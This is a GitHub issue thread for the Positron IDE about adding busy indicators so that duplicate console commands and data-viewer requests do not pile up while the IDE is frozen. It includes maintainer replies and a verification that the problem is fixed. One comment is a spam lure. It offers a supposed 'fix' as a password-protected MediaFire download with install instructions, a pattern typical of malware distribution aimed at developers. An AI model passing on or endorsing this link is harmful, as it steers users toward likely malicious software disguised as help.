### ISSUE TITLE
Provide appropriate prompts when the IDE is busy to avoid triggering requests multiple times.

### ISSUE THREAD

**Issue by ZhimingYe** [posit-dev/positron#4547]
#### Positron and OS details:

Positron Version: 2024.08.0 (Universal) build 83
Code - OSS Version: 1.92.0
Commit: f2238e0cf5fcc2a89b466d430775e135e9345852
Date: 2024-08-29T02:37:56.178Z
Electron: 30.1.2
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Darwin arm64 23.5.0

#### Interpreter details:

Python 3.9.18

## Describe the issue:

Related to #4546. Positron should automatically disable a feature after completing an operation (such as clicking preview) to prevent the same action from being triggered multiple times while waiting for a response. Additionally, a "busy" indicator should be provided. Users often worry about whether the console and their data might be lost.

## Steps to reproduce the issue:

Similar to #4546. 

(1) In this video ~15s

the same commands were sent to console at once when the IDE was unfreezed. 

https://github.com/user-attachments/assets/3c844f92-64fb-43a2-8f69-105e033b5c3c

(2) In this video ~15s

Opened many data viewer at once when the IDE was unfreezed. 

https://github.com/user-attachments/assets/575ef59f-944a-4101-b5f1-f58eb002834b

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jmcphers** [comment]
Related to #6169.

**Comment by seeM** [comment]
Thanks @ZhimingYe for the helpful writeup! This a broad problem, which we've ended up tracking across a few different issues:

- **First video:**
  - #4546
  - #8282
- **Second video:**
  - #6169
  - #8268

I think the situation has been significantly improved with these updates, so I'd like to close this once #8268 is merged, noting that #8282 will be addressed separately.

**Comment by ZhimingYe** [comment]
Thank you @seeM and the Positron team for your efforts on this. I'm now using the Positron IDE for my daily work, and its stability is excellent—I really love it. Thank you for your dedication. I believe it will surely become like RStudio, finding its way onto many computer desktops and becoming a representative milestone product in the coming decade. 🎉

**Comment by jonvanausdeln** [comment]
### Verified Fixed
Positron Version(s) : [2025.08.0-18](https://github.com/posit-dev/positron-builds/releases/tag/2025.08.0-18)
OS Version(s) : Windows 11

### Test scenario(s) 
No error messages and things are working as expected
View actions queue up as expected
